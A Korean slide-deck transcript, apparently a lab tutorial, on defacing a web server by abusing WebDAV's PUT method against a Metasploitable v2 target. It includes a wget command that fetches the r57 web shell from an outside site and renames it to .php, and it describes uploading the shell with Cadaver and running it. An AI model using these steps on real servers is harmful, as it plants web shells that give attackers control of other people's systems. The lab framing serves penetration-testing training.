Malicious Use HTTP Method

Writing by Ilsun Choi 1

HTTP Method악용 홈페이지 변조

11 차 디렉터리 노출 & HTTP Method 악용 홈페이지 변조최일선

E-mail : [email protected]


Index1. WebDAV 서비스 개요2. Put Method 실습 1) 환경분석 2) 실습 도구 3) 모의실습참고문헌



1. WebDAV 서비스 개요WebDAV?

(Web Distributed Authoring and Versioning 의 약자 )

• HTTP 프로토콜 이용• 원격지 웹 서버의 컨텐츠를 추가 / 관리 ( 확장 기능 )


http://en.wikipedia.org/wiki/WebDAV


2. Put Method 실습1) 환경분석 - Mesploitable v2

2) 실습 도구 \

- r57.php

- Cadaver

3) 모의실습



2. Put Method 실습 > 환경 분석 [1/2]

• 기본적으로 Metasploitable v2 는 WebDav 실습환경을 제공하고 있다 .

• 설치 후 해당 80 번 포트로 지원하는 웹 서버 페이지로 들어간다 .



2. Put Method 실습 > 환경 분석 [2/2]


• Options 를 사용하여 어떤 매소드가 활용 가능한 지 분석


2. Put Method 실습 > 실습도구 [1/2]

• 업로드할 소스• http://www.r57shell.net/shell/

r57.txt



2. Put Method 실습 > 실습도구 [2/2]

• Cadaver Command-Line WebDAV Client for Unix It supports file upload, download, on-screen display, namespace operations

(move/copy), collection creation and deletion, and locking operations.


http://www.webdav.org/cadaver/


2. Put Method 실습 > 모의실습 [1/6]

• 업로드 셸 파일 준비


root@kali:~# wget http://www.r57shell.net/shell/r57.txt root@kali:~# mv r57.txt r57.php



• Kali Linux 에서 Cadaver 를 사용할 수 있다 .

• help 를 입력하면 사용 가능한 도움말 출력 가능




• PUT method 를 활용하여 파일을 업로드한다 .




• WireShark Follow Stream – Request




• WireShark Follow Stream - Response




• http://192.168.157.140/dav/를 접속하면 정상적으로 업로드된 모습을 확인할 수 있다 .

• 파일을 직접 열면 셸이 정상 동작한다 .


http://192.168.157.140/dav/

http://192.168.157.140/dav/


참고문헌• http://blog.naver.com/chogar/220331811376

• 웹 모의해킹 및 시큐어코딩 진단가이드


http://blog.naver.com/chogar/220331811376

http://blog.naver.com/chogar/220331811376

Malicious Use HTTP Method

Technology

Transcript of Malicious Use HTTP Method